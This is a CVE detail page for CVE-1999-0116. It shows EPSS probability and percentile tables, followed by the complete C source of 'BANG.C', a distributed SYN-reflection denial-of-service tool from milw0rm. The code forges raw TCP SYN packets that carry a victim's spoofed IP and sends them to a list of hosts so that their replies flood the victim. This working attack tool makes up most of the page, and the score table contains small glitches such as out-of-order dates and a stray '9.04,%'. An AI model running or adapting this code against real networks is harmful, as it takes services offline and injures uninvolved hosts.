CVE-1999-0116 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.19%	–	–
2022-04-03	–	–	4.19%	–	–
2022-07-17	–	–	4.19%	–	–
2023-03-12	–	–	–	26.62%	–
2024-02-11	–	–	–	8.2%	–
2024-06-02	–	–	–	8.2%	–
2024-10-27	–	–	–	8.2%	–
2024-12-22	–	–	–	8.2%	–
2025-03-16	–	–	–	8.2%	–
2025-01-19	–	–	–	8.2%	–
2025-03-18	–	–	–	–	16.21%
2025-03-30	–	–	–	–	9.04%
2025-03-30	–	–	–	–	9.04,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	7%
2022-04-03	86%
2022-07-17	87%
2023-03-12	96%
2024-02-11	94%
2024-06-02	94%
2024-10-27	95%
2024-12-22	94%
2025-03-16	95%
2025-01-19	94%
2025-03-18	94%
2025-03-30	92%
2025-03-30	92%

/* * BANG.C Coded by Sorcerer of DALnet * * FUCKZ to: etech, blazin, udp, hybrid and kdl * PROPZ : skrilla, thanks for all your help with JUNO-Z and especially this code :) * -------------------------------- * REDIRECTION DOS FINALLY DISTRIBUTED !!!!!! * * This is POC and demonstrates a new method of DoS. The idea * behind it is that the attacker generates connection requests * to a list of hosts which have a TCP service running such as * http (80), telnet (23) etc. from the ip of the victim host. * This will result all of the hosts that the victim *requested* * connections to send back packets (usually SYN-ACK's) 2-3 of * them (amplification comes here!) causing load to the victim * by cauzing the victim to send RST packets since it never actually * requested any such connection. This attack is dangerous since * its almost impossible to filter!! * * hosts file should be in the format of 1 ip:port per line * i.e. 194.66.25.97:80 * 130.88.172.194:23 * 65.161.42.42:6667 * NOTE: target should only be ip, and all the hosts on the list should * also be ips thats for speed issues. * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #define __FAVOR_BSD #include <arpa/inet.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> unsigned short int getrandportid(void); unsigned short in_cksum(u_short *addr, int len); short int send_syn(unsigned long int , unsigned long int, unsigned short int); int sox; struct pseudo { unsigned long srca, dsta; unsigned char zero, proto; unsigned short tcplen; }; struct checksum { struct pseudo pp; struct tcphdr tt; }; /* Taken out since only works on x86 and rdtsc is also only pentium specific */ #if 0 /* Thanks to skrilla :) */ unsigned short mktcpsum1(struct packet *p,int len) { unsigned short old_sum = p->tcpsum; unsigned long s = (unsigned long)&p->sport; unsigned long sum = ((p->src >> 16) + (p->src & 0xffff) + (p->dst >> 16) + (p->dst & 0xffff) + (__htons__(6) + __htons__(len-20))); p->tcpsum=0; __asm__ __volatile__ ( /*"xorl %%eax,%%eax;" "cmpl $2,%%ecx;" "jb 1f;" "0:;" "lodsw;" "addw %%ax,%%dx;" "jnc 9f;" "addl $65536,%%edx;" "9:;" "decl %%ecx;" "loop 0b;" "1:;" "orb %%cl,%%cl;" "jz 2f;" "xorw %%ax,%%ax;" "lodsb;" "addw %%ax,%%dx;" "jnz 2f;" "addl $65536,%%edx;" "2:;" "movw %%dx,%%ax;" "shrl $16,%%edx;" "addw %%ax,%%dx;" "adcl $0xffff0000,%%edx;" "xorw $65535,%%dx;"*/ "movw %%dx,%%ax;" "shrl $16,%%edx;" "addw %%ax,%%dx;" "adcw $0,%%dx;" "testl $1,%%ecx;" "jz 0f;" "xorw %%ax,%%ax;" "lodsb;" "addw %%ax,%%dx;" "adcw $0,%%dx;" "0:;" "shrl $1,%%ecx;" "1:;" "lodsw;" "addw %%ax,%%dx;" "adcw $0,%%dx;" "loop 1b;" "andl $65535,%%edx;" "xorw $65535,%%dx;" :"=edx"(sum):"edx"(sum),"ecx"(len-20),"S"(&p->sport):"eax"); p->tcpsum=old_sum; return(sum); } unsigned long long int rdtsc(void) { unsigned long long int tsc; unsigned long int tsc_l,tsc_h; __asm__ volatile("rdtsc":"=%eax"(tsc_l),"=d"(tsc_h)); tsc=tsc_h; tsc=(tsc<<32)|tsc_l; return(tsc); } #endif int main(int argc, char **argv) { int enable=1,tmp,tmp2, loop, count=0; char *lala, *tmp1, buf[25]; unsigned long int ip[1000000], src; unsigned short int port[1000000]; FILE *fp; struct timeval start, end; printf("\nCoded by Sorcerer of DALnet\n\n"); if(argc != 4){ fprintf(stderr, "Incorrect usage try: %s <victim> <host-file> <loop host-file>\a\n", *argv); fprintf(stderr, "Example: %s 127.0.0.1 myhostsfile.txt 3\n\n", *argv); return(-1); } fp = fopen(argv[2], "r"); if(fp == NULL){ fprintf(stderr, "Error while opening: %s\n", argv[2]); perror("fopen"); return(-1); } loop = atoi(argv[3]); if(loop == 0){ fprintf(stderr, "Cannot loop 0 times you need to loop at least once\n"); return(-1); } for(tmp=0;tmp<=1000000;tmp++){ ip[tmp] = htons(23); port[tmp] = htons(23); } sox = socket(PF_INET, SOCK_RAW, 6); if(sox == -1){ perror("socket"); return(-1); } tmp = setsockopt(sox, IPPROTO_IP, IP_HDRINCL, &enable, sizeof(enable)); if(tmp == -1){ perror("setsockopt"); return(-1); } printf("Reading ips on memory and reconstructing in network byte order...\n"); fflush(stdout); while(1){ memset(buf, 0, 25); tmp1 = fgets(buf, 25, fp); if(tmp1 == NULL) break; if(strlen(buf) < 9) { printf("Bogus entry: %s\n", buf); continue; } lala = strchr((char *)&buf, ':'); port[count] = htons(atoi(++lala)); buf[strlen(buf)-strlen(lala)-1] = '\0'; ip[count] = inet_addr(buf); count++; printf("."); fflush(stdout); } printf("Done.\n"); src = inet_addr(argv[1]); tmp = gettimeofday((struct timeval *)&start, NULL); if(tmp == -1){ perror("gettimeofday"); return(-1); } for(tmp2=0;tmp2<loop;tmp2++) for(tmp=0;tmp<count;tmp++) send_syn(src, ip[tmp], port[tmp]); tmp = gettimeofday((struct timeval *)&end, NULL); if(tmp == -1){ perror("gettimeofday"); return(-1); } printf("\nTotal time taken: %lu\nBytes sent: %d\n", (end.tv_sec+end.tv_usec)-(start.tv_sec+start.tv_usec), count*loop*sizeof(char)*sizeof(struct ip)*sizeof(struct tcphdr)); return 0; } short int send_syn(unsigned long int src, unsigned long int dst, unsigned short int port) { struct sockaddr_in s; struct ip *i; struct tcphdr *t; struct pseudo p; struct checksum c; char packet[sizeof(char)*(sizeof(struct ip)+sizeof(struct tcphdr))]; int tmp; s.sin_family = PF_INET; s.sin_port = port; s.sin_addr.s_addr = dst; i = (struct ip *)&packet; t = (struct tcphdr *)((int)i+sizeof(struct ip)); memset(&packet, 0, sizeof(packet)); i->ip_hl = 5; i->ip_v = 4; i->ip_tos = 0x08; i->ip_len = htons(sizeof(packet)); i->ip_id = htons(getrandportid()); i->ip_off = 0; i->ip_ttl = 255; i->ip_p = 6; i->ip_sum = 0; i->ip_src.s_addr = src; i->ip_dst.s_addr = dst; t->th_sport = htons(getrandportid()); t->th_dport = port; t->th_seq = htons(getrandportid()); t->th_ack = 0; t->th_x2 = 0; t->th_off = 5; t->th_flags = 0x02; t->th_win = 65535; t->th_urp = 0; t->th_sum = 0; p.srca = src; p.dsta = dst; p.proto = 6; p.tcplen = htons(sizeof(struct tcphdr)); p.zero = 0; memcpy(&c.pp, &p, sizeof(p)); memcpy(&c.tt, t, sizeof(struct tcphdr)); t->th_sum = in_cksum((void *)&c, sizeof(c)); tmp = sendto(sox, packet, ntohs(i->ip_len), MSG_DONTWAIT, (struct sockaddr *)&s, sizeof(s)); if(tmp == -1){ perror("sendto"); return(-1); } return 0; } unsigned short int getrandportid(void) { unsigned short int port; struct timeval tv; gettimeofday((struct timeval *)&tv, NULL); srand(tv.tv_sec+tv.tv_usec); port = rand()+1; return(port); } /* Slow shit checksum function from RFC */ u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return(answer); } // milw0rm.com [2002-09-17]